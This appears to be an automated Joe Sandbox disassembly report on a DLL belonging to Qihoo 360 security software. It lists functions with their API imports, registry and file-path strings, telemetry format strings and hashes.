API ID: AddressProc$CriticalSectionmemset$AppendPath$??3@CountEnterErrorFileFreeInitializeLastLeaveLibraryModuleNameSpin
String ID: ..\deepscan\$360Safe$360util$QueryFileCancel$QueryFileClose$QueryFileCreate$QueryFilesEx2$QuerySetOption$cloudcom2.dll
API String ID: 1015768321-2684063875
Opcode ID: 75acf276f5303c209b0e6b56f5e71fa6dc54d5f9daca34d9052b038fe3a01ebd
Instruction ID: 85df055bf9425c6c0da70963d94a526d831783e1f19dc8973dcfbc1a34099653
Opcode Fuzzy Hash: 75acf276f5303c209b0e6b56f5e71fa6dc54d5f9daca34d9052b038fe3a01ebd
Instruction Fuzzy Hash: B2818032301B8896EBA6DF21ED403D933A5FB497D4F548125EA5A0BBA4DF38D768C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180066428 Relevance: 33.4, APIs: 13, Strings: 6, Instructions: 103registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 0000000180066475
RegQueryValueExW.ADVAPI32 ref: 00000001800664BA
RegCloseKey.ADVAPI32 ref: 00000001800664D7
RegOpenKeyExW.ADVAPI32 ref: 00000001800664FE
memset.MSVCRT ref: 0000000180066519
RegQueryValueExW.ADVAPI32 ref: 0000000180066556
RegCloseKey.ADVAPI32 ref: 000000018006656C
PathAppendW.SHLWAPI ref: 000000018006657E
PathFileExistsW.SHLWAPI ref: 0000000180066589

Part of subcall function 0000000180065F9C: GetModuleHandleW.KERNEL32 ref: 0000000180065FBE
Part of subcall function 0000000180065F9C: memset.MSVCRT ref: 0000000180065FD4

GetProcAddress.KERNEL32 ref: 00000001800665AF
FreeLibrary.KERNEL32 ref: 00000001800665C3
FreeLibrary.KERNEL32 ref: 00000001800665D0
RegCloseKey.ADVAPI32 ref: 00000001800665DD

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe, xrefs: 00000001800664F0
Init, xrefs: 00000001800665A5
SOFTWARE\360Safe\360Ent, xrefs: 0000000180066467
Path, xrefs: 0000000180066547
ServiceCall, xrefs: 00000001800664AF
\entclient\EntSvcCall_x64.dll, xrefs: 0000000180066572

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Close$FreeLibraryOpenPathQueryValuememset$AddressAppendExistsFileHandleModuleProc
String ID: Init$Path$SOFTWARE\360Safe\360Ent$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\360safe.exe$ServiceCall$\entclient\EntSvcCall_x64.dll
API String ID: 1498439332-702965266
Opcode ID: 7287dc7089829755e66462901955348d5673694c8cc533bc2c05e2a633cd80c9
Instruction ID: 4281fb2f7f8363f35efb0fd70a638a071d20137889dcc292f685ea46b841f4e2
Opcode Fuzzy Hash: 7287dc7089829755e66462901955348d5673694c8cc533bc2c05e2a633cd80c9
Instruction Fuzzy Hash: 74513E32614B4996EF918F20E8557DA73A0F7897C4F549116BA9F06A79EF38C74CCB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180024CD4 Relevance: 32.0, APIs: 6, Strings: 12, Instructions: 490COMMON

Download Yara Rule

APIs

wcsstr.MSVCRT ref: 0000000180024D2B
PathFindExtensionW.SHLWAPI ref: 0000000180024D45
wcsstr.MSVCRT ref: 0000000180024D81
_wcsicmp.MSVCRT ref: 0000000180024DBC
wcschr.MSVCRT ref: 0000000180025254
_wtoi.MSVCRT ref: 0000000180025266

Strings

LocalServer32, xrefs: 0000000180025573, 0000000180025592
InprocServer, xrefs: 0000000180025950, 000000018002596F
LocalServer, xrefs: 0000000180025539, 0000000180025558
ShellExecute, xrefs: 000000018002568D
CLSID, xrefs: 0000000180025490
Server, xrefs: 00000001800255AD, 00000001800255CC
InprocServer32, xrefs: 000000018002598A, 00000001800259A9
InprocHandler, xrefs: 00000001800259C4, 00000001800259E3
InprocHandler32, xrefs: 00000001800259FE, 0000000180025A1D
gfffffff, xrefs: 0000000180025519
gfffffff, xrefs: 0000000180025A39
\\?\, xrefs: 0000000180025ABC

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: wcsstr$ExtensionFindPath_wcsicmp_wtoiwcschr
String ID: CLSID$InprocHandler$InprocHandler32$InprocServer$InprocServer32$LocalServer$LocalServer32$Server$ShellExecute$\\?\$gfffffff$gfffffff
API String ID: 3861457700-2318594275
Opcode ID: 1a717cbbda8cc80c3c9297c878bbbc669d8a73a80a9fe28ac877bfe538569426
Instruction ID: f5eaf3cd70d8a4233fc3eb4f5baabc932733307175318797ea3a634ab2d80fd0
Opcode Fuzzy Hash: 1a717cbbda8cc80c3c9297c878bbbc669d8a73a80a9fe28ac877bfe538569426
Instruction Fuzzy Hash: 3A12B672301A4886EB92DF39C8407DD23A1FB85BE5F44D211EA6D576E9EF78CA48C704

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180056DE8 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 118COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,?,00000000), ref: 0000000180056E2B
_wcsicmp.MSVCRT ref: 0000000180056E62
_wcsicmp.MSVCRT ref: 0000000180056E79
memset.MSVCRT ref: 0000000180056E93
SHGetValueW.SHLWAPI ref: 0000000180056ECC
memset.MSVCRT ref: 0000000180056EF4
memset.MSVCRT ref: 0000000180056F1B

Part of subcall function 0000000180056534: memset.MSVCRT ref: 0000000180056572
Part of subcall function 0000000180056534: GetModuleFileNameW.KERNEL32 ref: 0000000180056589
Part of subcall function 0000000180056534: PathAppendW.SHLWAPI ref: 00000001800565AD
Part of subcall function 0000000180056534: _wcsicmp.MSVCRT ref: 00000001800565C8
Part of subcall function 0000000180056534: PathAppendW.SHLWAPI ref: 00000001800565DE

SHGetValueW.SHLWAPI ref: 0000000180056F5D
LeaveCriticalSection.KERNEL32 ref: 0000000180056F91

Strings

SOFTWARE\Wow6432Node\360EDRSensor, xrefs: 0000000180056F38
pid, xrefs: 0000000180056EB4
SOFTWARE\Wow6432Node\360EntSecurity, xrefs: 0000000180056F41
360ExtHost, xrefs: 0000000180056E58
SOFTWARE\Wow6432Node\360SD, xrefs: 0000000180056EBB
SOFTWARE\Wow6432Node\360Safe\Coop, xrefs: 0000000180056F0A
PCInfo, xrefs: 0000000180056E6F
ipartner, xrefs: 0000000180056F03
Partner, xrefs: 0000000180056F2F

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: memset$_wcsicmp$AppendCriticalPathSectionValue$EnterFileLeaveModuleName
String ID: 360ExtHost$PCInfo$Partner$SOFTWARE\Wow6432Node\360EDRSensor$SOFTWARE\Wow6432Node\360EntSecurity$SOFTWARE\Wow6432Node\360SD$SOFTWARE\Wow6432Node\360Safe\Coop$ipartner$pid
API String ID: 3226263223-3142758636
Opcode ID: 628566989c82da212381fb3148179b37bd681cc2eaf5be604a1b5c7982e4b541
Instruction ID: 9533c192c26b347b8b9675f8c4be5ba0e6f9fe9a3a5b632a6bc0f6ba07ebb3e1
Opcode Fuzzy Hash: 628566989c82da212381fb3148179b37bd681cc2eaf5be604a1b5c7982e4b541
Instruction Fuzzy Hash: CF419D31A00A0C94FB96DB22A8403D963A4F74DBE4F909225FD28677A5EF39C74EC340

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180044F64 Relevance: 30.1, APIs: 9, Strings: 8, Instructions: 320COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

_cwprintf_s_l.LIBCMT ref: 00000001800450AA
_cwprintf_s_l.LIBCMT ref: 00000001800450C2
_cwprintf_s_l.LIBCMT ref: 00000001800450D8

Part of subcall function 0000000180017B44: memset.MSVCRT ref: 0000000180017B79
Part of subcall function 0000000180017B44: memset.MSVCRT ref: 0000000180017BCB
Part of subcall function 0000000180017B44: InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,?,?,?,?,0000000180006327), ref: 0000000180017BD6
Part of subcall function 0000000180017B44: GetLastError.KERNEL32(?,?,?,?,?,?,0000000180006327), ref: 0000000180017BE0
Part of subcall function 0000000180017B44: GetTickCount.KERNEL32 ref: 0000000180017BF8

Part of subcall function 000000018000D19C: ??2@YAPEAX_K@Z.MSVCRT ref: 000000018000D22A
Part of subcall function 000000018000D19C: memset.MSVCRT ref: 000000018000D270
Part of subcall function 000000018000D19C: memmove.MSVCRT ref: 000000018000D282
Part of subcall function 000000018000D19C: ??3@YAXPEAX@Z.MSVCRT ref: 000000018000D2B8

memmove.MSVCRT ref: 000000018004518F
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800451AE
??3@YAXPEAX@Z.MSVCRT ref: 00000001800451EB
GetTickCount.KERNEL32 ref: 0000000180045357
srand.MSVCRT ref: 000000018004535F
rand.MSVCRT ref: 0000000180045365

Strings

com, xrefs: 000000018004504A
DomainQuery, xrefs: 00000001800450AF
router:1, xrefs: 000000018004506E
router, xrefs: 000000018004507A
360safe, xrefs: 0000000180045086
[%s], xrefs: 0000000180045051, 00000001800450B6
mid=%sm2=%sproduct=%scombo=%srule_group_id=%suv=%s, xrefs: 000000018004509E
0=%s, xrefs: 00000001800450CC

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: Count_cwprintf_s_lmemset$??3@Tickmemmove$??2@CriticalErrorHeapInitializeLastProcessSectionSpinrandsrand
String ID: 0=%s$360safe$DomainQuery$[%s]$com$mid=%sm2=%sproduct=%scombo=%srule_group_id=%suv=%s$router$router:1
API String ID: 1789426470-3446598425
Opcode ID: 61786b1980ef7039dc4211af90e47e9a0e74f34993d56612bf85e9d061f4368c
Instruction ID: 6d6f9855de1d8c5247af129e1c82467daf937bd8777ee679c9f2b2c93b700a4d
Opcode Fuzzy Hash: 61786b1980ef7039dc4211af90e47e9a0e74f34993d56612bf85e9d061f4368c
Instruction Fuzzy Hash: D8D19132204F4882EB419B69D8803DE73A0F789BE5F108226BAAD477E5DF78C649C704

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004C034 Relevance: 29.9, APIs: 13, Strings: 4, Instructions: 112memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 000000018004C074
OpenProcessToken.ADVAPI32 ref: 000000018004C085
GetTokenInformation.ADVAPI32 ref: 000000018004C0B8
GetLastError.KERNEL32 ref: 000000018004C0C8
GlobalAlloc.KERNEL32 ref: 000000018004C0E3
GetTokenInformation.ADVAPI32 ref: 000000018004C115
LookupAccountSidW.ADVAPI32 ref: 000000018004C156
CloseHandle.KERNEL32 ref: 000000018004C175
GlobalFree.KERNEL32 ref: 000000018004C183
wcscmp.MSVCRT ref: 000000018004C19D
wcscmp.MSVCRT ref: 000000018004C1B4
wcscmp.MSVCRT ref: 000000018004C1CB
wcscmp.MSVCRT ref: 000000018004C1E2

Strings

SYSTEM, xrefs: 000000018004C1A6
NETWORK SERVICE, xrefs: 000000018004C1D4
NT AUTHORITY, xrefs: 000000018004C193
LOCAL SERVICE, xrefs: 000000018004C1BD

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: wcscmp$Token$GlobalInformationProcess$AccountAllocCloseCurrentErrorFreeHandleLastLookupOpen
String ID: LOCAL SERVICE$NETWORK SERVICE$NT AUTHORITY$SYSTEM
API String ID: 3141378966-199577007
Opcode ID: 8d6976f719ecb46038f7faa6d62441ad30095ab4bbf55d005c38fee77e3359ad
Instruction ID: cee3605f7c7adaec53412b2e982fb153fefebb873c81ca2b5be3308eddbb09f0
Opcode Fuzzy Hash: 8d6976f719ecb46038f7faa6d62441ad30095ab4bbf55d005c38fee77e3359ad
Instruction Fuzzy Hash: F2517C32604B4986EBE28F14E8847DA73A5F78D7D8F518125EA5D436A4DF39C70DCB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018003AC1C Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 107COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018003AC67
GetModuleHandleW.KERNEL32 ref: 000000018003AC73
GetModuleFileNameW.KERNEL32 ref: 000000018003AC8E
memset.MSVCRT ref: 000000018003ACAE
GetModuleFileNameW.KERNEL32 ref: 000000018003ACC4
PathAppendW.SHLWAPI ref: 000000018003ACEA
PathAppendW.SHLWAPI ref: 000000018003ACFC
GetFileAttributesW.KERNEL32 ref: 000000018003AD07
PathAppendW.SHLWAPI ref: 000000018003AD36
PathAppendW.SHLWAPI ref: 000000018003AD48

Strings

..\deepscan\, xrefs: 000000018003ACDE
..\, xrefs: 000000018003AD2A
bapi64.dll, xrefs: 000000018003AC6C, 000000018003ACF0, 000000018003AD3C

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: AppendPath$FileModule$Namememset$AttributesHandle
String ID: ..\$..\deepscan\$bapi64.dll
API String ID: 2144934147-2390674060
Opcode ID: 9d5beebac642680a506550c8be48c190e39914ceb82cb04c52bb84f1375e2870
Instruction ID: 18b05e09174244348b6cef7f8f2b1baf28e5037f203e247325d4c6a64b139c1b
Opcode Fuzzy Hash: 9d5beebac642680a506550c8be48c190e39914ceb82cb04c52bb84f1375e2870
Instruction Fuzzy Hash: 6F514B32614A8882FBA3DB20EC443DA3361F78D7C9F859125E59A47AA5EF2DC74DC740

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004872C Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 318COMMON

Download Yara Rule

APIs

Part of subcall function 000000018000A7AC: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000180001020), ref: 000000018000A7D5

_cwprintf_s_l.LIBCMT ref: 0000000180048845
_cwprintf_s_l.LIBCMT ref: 000000018004885A
IsBadStringPtrW.KERNEL32 ref: 0000000180048873
_cwprintf_s_l.LIBCMT ref: 000000018004888F
memmove.MSVCRT ref: 0000000180048946
??_V@YAXPEAX@Z.MSVCRT ref: 00000001800489B5
??3@YAXPEAX@Z.MSVCRT ref: 00000001800489F2
GetTickCount.KERNEL32 ref: 0000000180048B0C
srand.MSVCRT ref: 0000000180048B14
rand.MSVCRT ref: 0000000180048B1A

Strings

%d=%s, xrefs: 0000000180048883
com, xrefs: 00000001800487E7
mid=%sm2=%sproduct=%scombo=%srule_group_id=%suv=%spid=%s, xrefs: 0000000180048839
[%s], xrefs: 00000001800487EE, 000000018004884E

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: _cwprintf_s_l$??3@CountHeapProcessStringTickmemmoverandsrand
String ID: %d=%s$[%s]$com$mid=%sm2=%sproduct=%scombo=%srule_group_id=%suv=%spid=%s
API String ID: 2740332460-2247268028
Opcode ID: 48d86df3b5eac7e439a35ff4fd84f198e4b1e974b1358ce155bcc0297089f372
Instruction ID: 80426b886386f52412969e15ba132e6e65bce95777886caa6ce0aa64614bcf94
Opcode Fuzzy Hash: 48d86df3b5eac7e439a35ff4fd84f198e4b1e974b1358ce155bcc0297089f372
Instruction Fuzzy Hash: 5FD1C172305F4886EB51DB29E88039E73A0FB88BE8F158625AE5D077A5DF78C549C704

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004F018 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 116COMMON

Download Yara Rule

APIs

wcsstr.MSVCRT ref: 000000018004F06D
_wcsicmp.MSVCRT ref: 000000018004F102
_wcsnicmp.MSVCRT ref: 000000018004F11C
_wcsicmp.MSVCRT ref: 000000018004F14D
_wcsnicmp.MSVCRT ref: 000000018004F167
_wcsicmp.MSVCRT ref: 000000018004F17B
_wcsnicmp.MSVCRT ref: 000000018004F195

Strings

wow6432node, xrefs: 000000018004F066
Software\Classes\Wow6432Node\, xrefs: 000000018004F15D
Software\Wow6432Node\, xrefs: 000000018004F18B
Software\Classes\Wow6432Node, xrefs: 000000018004F143
Wow6432Node, xrefs: 000000018004F0F8
Software\Wow6432Node, xrefs: 000000018004F171
Wow6432Node\, xrefs: 000000018004F112

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: _wcsicmp_wcsnicmp$wcsstr
String ID: Software\Classes\Wow6432Node$Software\Classes\Wow6432Node\$Software\Wow6432Node$Software\Wow6432Node\$Wow6432Node$Wow6432Node\$wow6432node
API String ID: 4199785700-2224805171
Opcode ID: bc25291bcc814f054e7e10840494f54f48fde9230fe93c8f0d5c0c6b2b3ad0be
Instruction ID: 173969ce7e51924b4f06bf421c606f91b3afd6de77e358442d966ae2f37bd097
Opcode Fuzzy Hash: bc25291bcc814f054e7e10840494f54f48fde9230fe93c8f0d5c0c6b2b3ad0be
Instruction Fuzzy Hash: 55517371710E48C1EBA6DB29D8843B923A1B789BE4F46C215EA39437E4DF68CB4CC745

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180014138 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 92COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018001417F
GetModuleFileNameW.KERNEL32 ref: 0000000180014196
PathAppendW.SHLWAPI ref: 00000001800141A8

Part of subcall function 0000000180065EE4: PathFileExistsW.SHLWAPI ref: 0000000180065F00
Part of subcall function 0000000180065EE4: EnterCriticalSection.KERNEL32 ref: 0000000180065F2A
Part of subcall function 0000000180065EE4: LeaveCriticalSection.KERNEL32 ref: 0000000180065F73

memset.MSVCRT ref: 00000001800141E1
GetModuleFileNameW.KERNEL32 ref: 00000001800141F8
PathAppendW.SHLWAPI ref: 000000018001420A
PathFileExistsW.SHLWAPI ref: 0000000180014215
memset.MSVCRT ref: 0000000180014229
GetModuleFileNameW.KERNEL32 ref: 0000000180014240
PathAppendW.SHLWAPI ref: 0000000180014252
PathFileExistsW.SHLWAPI ref: 000000018001425D

Strings

..\360sd.exe, xrefs: 00000001800141FE
..\safemon\360Cactus.tpi, xrefs: 000000018001419C
..\360SkinMgr.exe, xrefs: 0000000180014246

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: FilePath$AppendExistsModuleNamememset$CriticalSection$EnterLeave
String ID: ..\360SkinMgr.exe$..\360sd.exe$..\safemon\360Cactus.tpi
API String ID: 2738204422-1657815065
Opcode ID: 78597d9bd975c32090d8355579ef8ffe821f8875940c9f43dd2c1350df723c28
Instruction ID: 05d3995d6e5afe1b7f2ff7eb98ba3dbe6d41cc5d548c72c66593806649a32fef
Opcode Fuzzy Hash: 78597d9bd975c32090d8355579ef8ffe821f8875940c9f43dd2c1350df723c28
Instruction Fuzzy Hash: 0E417131614A8D82EBE69B21EC953EA27A4F79D784F80C055F99E476A5DF2DC30DCB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004C3C8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 187COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018004C433
GetModuleFileNameW.KERNEL32 ref: 000000018004C44D
PathAppendW.SHLWAPI ref: 000000018004C462

Strings

..\360bps.dat, xrefs: 000000018004C453
//lsp/fnp, xrefs: 000000018004C66D
//lsp/fnpw, xrefs: 000000018004C685

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: AppendFileModuleNamePathmemset
String ID: ..\360bps.dat$//lsp/fnp$//lsp/fnpw
API String ID: 1620117007-629564897
Opcode ID: 8b88fd5d987282aa7e8cbcbc9338ad7a6d43f93b19f4f5ae7e83081502dc9fb0
Instruction ID: 9751cd454638bcc7bf23e097769634142843b259acdcdf6531404e40a8ce2858
Opcode Fuzzy Hash: 8b88fd5d987282aa7e8cbcbc9338ad7a6d43f93b19f4f5ae7e83081502dc9fb0
Instruction Fuzzy Hash: FF918431209B8882EAD2CF15E8847DDB7A4F7887D4F418116EA9943BA9DF7CC64DCB01

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000E07C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 163filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 000000018000E0E1
GetFileSizeEx.KERNEL32 ref: 000000018000E0FB
malloc.MSVCRT ref: 000000018000E127
memset.MSVCRT ref: 000000018000E142
ReadFile.KERNEL32 ref: 000000018000E15C

Part of subcall function 000000018000DDA4: EnterCriticalSection.KERNEL32 ref: 000000018000DDEB
Part of subcall function 000000018000DDA4: LeaveCriticalSection.KERNEL32 ref: 000000018000DE34

malloc.MSVCRT ref: 000000018000E22B
memset.MSVCRT ref: 000000018000E247

Part of subcall function 000000018000DC14: EnterCriticalSection.KERNEL32 ref: 000000018000DC5D
Part of subcall function 000000018000DC14: LeaveCriticalSection.KERNEL32 ref: 000000018000DCA6

GetFileTime.KERNEL32 ref: 000000018000E281
CloseHandle.KERNEL32 ref: 000000018000E28F
free.MSVCRT ref: 000000018000E29C
free.MSVCRT ref: 000000018000E2AF

Strings

|, xrefs: 000000018000E18C
D063, xrefs: 000000018000E176

Memory Dump Source

Source File: 00000005.00000002.1682747443.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000005.00000002.1682727670.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683251863.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683347248.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683366607.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000005.00000002.1683409519.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalFileSection$EnterLeavefreemallocmemset$CloseCreateHandleReadSizeTime
String ID: D063$|
API String ID: 1613485820-3743183194
Opcode ID: 180749bbb112b904ef6176165a202792b4826eb4bf0b5cc93a95b31eeb2a1677
Instruction ID: 1c0486e52071ce2fa8a0c36d95268ac158065e3f2ce4ac4886627ad722c994ab
Opcode Fuzzy Hash: 180749bbb112b904ef6176165a202792b4826eb4bf0b5cc93a95b31eeb2a1677
Instruction Fuzzy Hash: 0A61AF327016588AFBD6CFA5E9457A873E9B70DBD8F008025EE0957BA8DF34C649C711

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180056C84 Relevance: 22.8, APIs: 6, Strings: 7, Instructions: 93COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000180056CB4
SHGetValueW.SHLWAPI(?,?,000000018004825D,?,?,?,?,?,?,?,000000018000644F), ref: 0000000180056D05

Part of subcall function 00000001800562D0: memset.MSVCRT ref: 000000018005630E
Part of subcall function 00000001800562D0: GetModuleFileNameW.KERNEL32 ref: 0000000180056325
Part of subcall function 00000001800562D0: PathAppendW.SHLWAPI ref: 0000000180056349
Part of subcall function 00000001800562D0: _wcsicmp.MSVCRT ref: 0000000180056364
Part of subcall function 00000001800562D0: PathAppendW.SHLWAPI ref: 000000018005637A

memset.MSVCRT ref: 0000000180056D30
